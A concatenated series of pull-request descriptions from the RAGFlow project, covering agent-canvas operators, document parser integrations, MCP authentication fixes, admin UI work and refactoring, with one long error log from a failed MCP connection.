- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the selected variables in the variable aggregation node.
#10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The output is derived based on the configuration of the variable
aggregation operator. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Added some prompts and polling functionality to retrieve data
source logs.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The doc file cannot be parsed(#11092)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: virgilwong <hyhvirgil@gmail.com>
### What problem does this PR solve?
Feat: Add a form for variable aggregation operators #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: OpenSearch retrieval no return #11006
Add documentation #11072
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Fix: Improve some functional issues with the data source. #10703
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
```
admin> show version;
show_version
+-----------------------+
| version |
+-----------------------+
| v0.21.0-241-gc6cf58d5 |
+-----------------------+
admin> \q
Goodbye!
```
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Currently we cannot add any models, since factory is a string, and the
return type of get_allowed_llm_factories() is List[object]
https://github.com/infiniflow/ragflow/pull/11003
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
RAPTOR handle cancel gracefully.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add variable aggregator node #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
GraghRAG handle cancel gracefully. #10997.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: fix pdf_parser ignored in rag/app/naive.py #11000
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add variable assignment node #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The agent operator and message operator can only select string
variables as prompt words. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feature: Added data source functionality
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The value of data operations operators can be either input or
referenced from variables. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue of errors when using agents created from templates.
#10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix MCP cannot handle empty Auth field properly, then result in
```bash
2025-11-05 11:10:41,919 INFO 51209 Negotiated protocol version: 2025-06-18
2025-11-05 11:10:41,920 INFO 51209 client_session initialized successfully
2025-11-05 11:10:41,994 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:10:41] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:10:41,999 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:10:42,000 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:10:42,001 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:10:42] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:11:30,441 INFO 51209 Negotiated protocol version: 2025-06-18
2025-11-05 11:11:30,442 INFO 51209 client_session initialized successfully
2025-11-05 11:11:30,520 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:30] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:11:30,525 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:11:30,526 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:11:30,527 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:30] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:11:31,476 INFO 51209 Negotiated protocol version: 2025-06-18
2025-11-05 11:11:31,476 INFO 51209 client_session initialized successfully
2025-11-05 11:11:31,549 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:31] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:11:31,552 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:11:31,553 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:11:31,554 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:31] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:11:51,930 ERROR 51209 unhandled errors in a TaskGroup (1 sub-exception)
+ Exception Group Traceback (most recent call last):
| File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 86, in _mcp_server_loop
| async with streamablehttp_client(url, headers) as (read_stream, write_stream, _):
| File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/contextlib.py", line 217, in __aexit__
| await self.gen.athrow(typ, value, traceback)
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/mcp/client/streamable_http.py", line 478, in streamablehttp_client
| async with anyio.create_task_group() as tg:
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/anyio/_backends/_asyncio.py", line 781, in __aexit__
| raise BaseExceptionGroup(
| exceptiongroup.ExceptionGroup: unhandled errors in a TaskGroup (1 sub-exception)
+-+---------------- 1 ----------------
| Traceback (most recent call last):
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/mcp/client/streamable_http.py", line 409, in handle_request_async
| await self._handle_post_request(ctx)
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/mcp/client/streamable_http.py", line 278, in _handle_post_request
| response.raise_for_status()
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/httpx/_models.py", line 829, in raise_for_status
| raise HTTPStatusError(message, request=request, response=self)
| httpx.HTTPStatusError: Server error '502 Bad Gateway' for url 'http://192.168.1.38:9382/mcp'
| For more information check: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/502
+------------------------------------
2025-11-05 11:11:51,942 ERROR 51209 Error fetching tools from MCP server: streamable-http: http://192.168.1.38:9382/mcp
Traceback (most recent call last):
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 168, in get_tools
return future.result(timeout=timeout)
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/concurrent/futures/_base.py", line 458, in result
return self.__get_result()
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result
raise self._exception
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._get_tools_from_mcp_server) at 0x7d58f02e2c20>", line 40, in _get_tools_from_mcp_server
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 160, in _get_tools_from_mcp_server
result: ListToolsResult = await self._call_mcp_server("list_tools", timeout=timeout)
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._call_mcp_server) at 0x7d58f02e2b00>", line 63, in _call_mcp_server
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 139, in _call_mcp_server
raise result
ValueError: Connection failed (possibly due to auth error). Please check authentication settings first
2025-11-05 11:11:51,943 ERROR 51209 Test MCP error: Connection failed (possibly due to auth error). Please check authentication settings first
Traceback (most recent call last):
File "/home/xxxxxxxxx/workspace/ragflow/api/apps/mcp_server_app.py", line 429, in test_mcp
tools = tool_call_session.get_tools(timeout)
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession.get_tools) at 0x7d58f02e2cb0>", line 40, in get_tools
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 168, in get_tools
return future.result(timeout=timeout)
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/concurrent/futures/_base.py", line 458, in result
return self.__get_result()
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result
raise self._exception
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._get_tools_from_mcp_server) at 0x7d58f02e2c20>", line 40, in _get_tools_from_mcp_server
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 160, in _get_tools_from_mcp_server
result: ListToolsResult = await self._call_mcp_server("list_tools", timeout=timeout)
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._call_mcp_server) at 0x7d58f02e2b00>", line 63, in _call_mcp_server
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 139, in _call_mcp_server
raise result
ValueError: Connection failed (possibly due to auth error). Please check authentication settings first
2025-11-05 11:11:51,944 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:11:51,945 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:11:51,946 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:51] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:12:20,484 INFO 51209 Negotiated protocol version: 2025-06-18
2025-11-05 11:12:20,485 INFO 51209 client_session initialized successfully
2025-11-05 11:12:20,570 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:12:20] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:12:20,573 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:12:20,574 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:12:20,575 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:12:20] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:15:02,119 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:15:02] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:16:24,967 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:16:24] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:30:24,284 ERROR 51209 Task was destroyed but it is pending!
task: <Task pending name='Task-58' coro=<MCPToolCallSession._mcp_server_loop() running at <@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._mcp_server_loop) at 0x7d58f02e29e0>:11> wait_for=<Future pending cb=[Task.task_wakeup()]> cb=[_chain_future.<locals>._call_set_state() at /home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/futures.py:392]>
2025-11-05 11:30:24,285 ERROR 51209 Task was destroyed but it is pending!
task: <Task pending name='Task-67' coro=<Queue.get() running at /home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/queues.py:159> wait_for=<Future pending cb=[Task.task_wakeup()]> cb=[_release_waiter(<Future pendi...ask_wakeup()]>)() at /home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/tasks.py:387]>
Exception ignored in: <coroutine object Queue.get at 0x7d585480ace0>
Traceback (most recent call last):
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/queues.py", line 161, in get
getter.cancel() # Just in case getter is not done yet.
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/base_events.py", line 753, in call_soon
self._check_closed()
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/base_events.py", line 515, in _check_closed
raise RuntimeError('Event loop is closed')
RuntimeError: Event loop is closed
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Submit clean data operations form data to the backend. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Now markdown table extractor supports <table ...>. #10966
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Support more chunking methods #10772
This PR enables multiple chunking methods — including books, laws,
naive, one, and presentation — to be used with all existing PDF parsers
(DeepDOC, MinerU, Docling, TCADP, Plain Text, and Vision modes).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Fix selected radio button text misaligned with radio button dot
- Fix `<ScrollArea>` scrollbar z-index issue
- Add backdrop blur effect on scrollbar thumbs
- Adjust some styles to match the design
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
1. Move EMBEDDING_CFG to common.globals
2. Fix error imports
3. Move signal handles to common/signal_utils.py
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
new component:Data Operations
#10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, if we want to restrict the allowed factories users can use we
need to delete from the database table manually. The proposal of this PR
is to include a variable to that, if set, will restrict the LLM
factories the users can see and add. This allow us to not touch the
llm_factories.json or the database if the LLM factory is already
inserted.
Obs.: All the lint changes were from the pre-commit hook which I did not
change.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add a form with data operations operators #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Refine Confluence connector.
#10953
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
### What problem does this PR solve?
Add support for MinerU http-client/server method.
To use MinerU with vLLM server:
1. Set up a vLLM server running MinerU:
```bash
mineru-vllm-server --port 30000
```
2. Configure the following environment variables:
- `MINERU_EXECUTABLE=/ragflow/uv_tools/.venv/bin/mineru` (or the path to
your MinerU executable)
- `MINERU_BACKEND="vlm-http-client"`
- `MINERU_SERVER_URL="http://your-vllm-server-ip:30000"`
3. Follow the standard MinerU setup steps as described above.
With this configuration, RAGFlow will connect to your vLLM server to
perform document parsing, which can significantly improve parsing
performance for complex documents while reducing the resource
requirements on your RAGFlow server.


### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
---------
Co-authored-by: writinwaters <cai.keith@gmail.com>
### What problem does this PR solve?
1. Update RetCode to common.constants
2. Decouple the admin and API modules
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
1. Rename identifier name
2. Fix some return statement
3. Fix some typos
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Feat: Add data operation node #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Create dataset performance unmatched between HTTP api and web ui
#10925
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
change:
wrong param in meta_data_filter
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Fix MCP test connection authentication issues by updating frontend
request format
- Add variables field with authorization_token for template substitution
- Change headers to use proper Authorization Bearer format with template
variable
🤖 Generated with [Claude Code](https://claude.ai/code)
### What problem does this PR solve?
correct MCP server authentication header format in frontend
### Type of change
* [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Marvion <marvionliu@wukongjx.cn>
Co-authored-by: Claude <noreply@anthropic.com>
### What problem does this PR solve?
Feat: Add variables to the metadata filtering function of the knowledge
retrieval component. #10861
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed an issue where dragged operators within an iteration were
not associated with the iteration. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…e retrieval component.
### What problem does this PR solve?
issue:
#10861
change:
add variables to the metadata filtering function of the knowledge
retrieval component
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#10890](https://github.com/infiniflow/ragflow/issues/10890)
change:
missing embedding vector on Tokenizer
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
change:
wrong describe_with_prompt() in ollama
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Filter structured output data directly during the rendering stage.
#10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: UnicodeDecodeError: 'gb2312' codec can't decode byte 0xab in
position 560: illegal multibyte sequence.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The structured output of the variable query can also be clicked.
#10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add whitelist management and role management in Admin UI
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The query variable of a loop operator can be a nested array
variable. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: parsing hyperlinks in docx and pdf #10848
Fix: default parser config of toc extraction
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add get_uuid, download_img and hash_str2int into misc_utils.py
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: The nodes on the canvas were not updated in time after the operator
name was modified. #10866
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the styling and logic issues on the model provider page
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Rename the files in the jsonjoy-builder directory to lowercase.
#10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Refactor(setting-model): Refactor the model management interface and
optimize the component structure. #10703
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Modify the style of the query variable dropdown list. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add '|| true' to docker rmi command to prevent workflow failure when
image removal fails. This ensures the CI pipeline continues even if the
Docker image cannot be removed for any reason.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Fix login card will overlap title in admin login page.
- Disable unnecessary `listRoles()` query in user management page and
create user form
- Disable admin UI API queries and mutations retry mechanism
- Fix page not redirect to login page automatically if API reports
unauthorized (401)
- Fix change password form not reset when change password modal close
- Resolve admin UI content (mostly long texts) may break layout main box
issue
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The query variables of the subsequent operators can reference the
structured variables defined in the agent operator. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: the input length exceeds the context length #10750
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Video parser should follow selected VLM, rather than default one.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#10890](https://github.com/infiniflow/ragflow/issues/10890)
change:
enhance delimiters in markdown parser
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
support local mineru api in docker instance. like no gpu in wsl on
windows, but has mineru api with gpu support.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: opensearch retrieval error #10828
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What does this PR solve?
German translation for all agent template and optimizing line breaks in
the title for the new translation.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allow other operators to reference the structured output defined
by the agent operator. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Added SVR_WEB_HTTP_PORT=80, SVR_WEB_HTTPS_PORT=443, and
SVR_MCP_PORT=9382 to the Docker environment configuration to support
standard web ports and Model Control Protocol access.
### Type of change
- [x] Update config
### What problem does this PR solve?
This commit removes the Youdao and BAAI entries from the LLM factories
configuration as they are no longer needed or supported.
### Type of change
- [x] Config update
### What problem does this PR solve?
Feat: Configure structured data output for agent forms #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add 'how to access login UI and admin UI'.
### Type of change
- [x] Documentation Update
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Now admin client default port is '8080', update it to '9381'
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Allow initialize Redis without password.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Updated test cases in test_retrieval_chunks.py to:
- Remove skip mark from page pagination test case (#6646 resolved)
- Add skip marks for page_size=1 tests due to new issue (#10692)
### Type of change
- [x] Test update
### What problem does this PR solve?
Remove 'DID YOU KNOW', when start front-end
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: Refactor the similarity slider component and modify the style of
the dataset-test page
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the agent operator form tool #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add time utilities and unit tests
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
issue:
#10825
change:
remove unexpected keyword argument in table_structure_recognizer logging
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- rename rmSpace to remove_redundant_spaces
- move clean_markdown_block to common module
- add unit tests for remove_redundant_spaces and clean_markdown_block
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: parsing excel with chartsheet #10815
Fix: Clamp begin to a minimum of 0 to prevent negative indexing #10804
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the agent operator form #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: bug fixes and icon replacement #10703
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#10789](https://github.com/infiniflow/ragflow/issues/10789)
change:
All-in-one MinerU and Docling
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the style of the toolbar at the bottom of the agent canvas
#10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
MinerU supports VLM-Transfomers backend.
Set `MINERU_BACKEND="pipeline"` to choose the backend. (Options:
pipeline | vlm-transformers, default is pipeline)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Home and team page style adjustment, and some bug fixes#10703
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR adds a new TCADP (Tencent Cloud Advanced Document Processing)
parser to RAGFlow, enabling users to leverage Tencent Cloud's document
parsing capabilities for more accurate and structured document
processing. The implementation includes:
New TCADP Parser: A complete implementation of Tencent Cloud's document
parsing API without SDK dependency
Configuration Support: Added configuration options in service_conf.yaml
for Tencent Cloud API credentials
Frontend Integration: Updated UI components to support the new TCADP
parser option
Error Handling: Comprehensive error handling and retry mechanisms for
API calls
Result Processing: Support for both SSE streaming and JSON response
formats from Tencent Cloud API
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fixed the bug that the "dataset_ids" field will not be updated if an
empty array is passed when updating the assistant
### Type of change
- [*] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Could not delete Entity Types from the Knowledge Graph settings. The
list was not updated on pressing the X on a tag.
What I think happened:
- value={field} was passing ['parser_config','entity_types'] to EditTag
instead of the real tags.
- That blocked AntD Form from injecting the right value/onChange.
- Clicking X filtered the wrong “value,” so no visible change.
Fix:
- Remove value={field} and let Form.Item control EditTag.
- EditTag now gets the real tags array and emits onChange(tags), Form
captures it.
Now it works.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the canvas node #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where dataset log avatars were displayed
incorrectly #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: prio synonym match than wordnet for english
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Introduced gpu profile in .env
Added Dockerfile_tei
fix datrie
Removed LIGHTEN flag
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Move some test files to test/testcases
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
issue:
#3945
change:
add Docling parser
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.21.0 to v0.21.1
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Clicking "Stop receiving messages" in Firefox will cause the page
to crash. #10752
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The default value of the parser operator's Video output format is
set to text #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Bump infinity to 0.6.1
#10727 missed `docker/docker-compose-base.yml`.
### Type of change
- [x] Other (please describe):
### What problem does this PR solve?
Fix: Resolved the issue where the Generate button must be refreshed
after generating chunk to take effect
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add suffix to the parser operator's video configuration #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Pipeline supports MinerU PDF parser.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that filename is not displayed on the overview
page; and added the processing logic of the generate button when chunk=0
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Update version, and remove '_canvas' suffix in agent_category.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the video field in the parser operator #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix: Optimize the style of the personal center sidebar component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: can't upload image in ollama model #10447
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### Change all `image=[]` to `image = None`
Changing `image=[]` to `images=None` avoids Python’s mutable default
parameter issue.
If you keep `images=[]`, all calls share the same list, so modifying it
(e.g., images.append()) will affect later calls.
Using images=None and creating a new list inside the function ensures
each call is independent.
This change does not affect current behavior — it simply makes the code
safer and more predictable.
把 `images=[]` 改成 `images=None` 是为了避免 Python 默认参数的可变对象问题。
如果保留 `images=[]`,所有调用都会共用同一个列表,一旦修改就会影响后续调用。
改成 None 并在函数内部重新创建列表,可以确保每次调用都是独立的。
这个修改不会影响现有运行结果,只是让代码更安全、更可控。
### What problem does this PR solve?
Feat: Adjust the style of the mcp dialog #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add fault-tolerant mechanism to GraphRAG. #10406.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Change the style of all cards according to the design #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix potential negative max_tokens in RAPTOR. #10235.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue
### What problem does this PR solve?
Feat: Move the pipeline translation field to flow #9869
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: A pipeline's child node can only have one node #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Updated test cases in test_retrieval_chunks.py to:
- Remove skip mark from page pagination test case (issues/6646 resolved)
- Add skip marks for page_size=1 tests due to new issue (issues/10692)
### Type of change
- [x] Test
### What problem does this PR solve?
Feat: Display the pipeline operation sheet on the agent page #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Make knowledge base renaming automatically reflected in agent
discussions, solved #10597
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Support attribute filtering #8703
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
Co-authored-by: writinwaters <cai.keith@gmail.com>
### What problem does this PR solve?
issue:
[#9272](https://github.com/infiniflow/ragflow/issues/9272)
change:
setting metadata in the retrieval
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
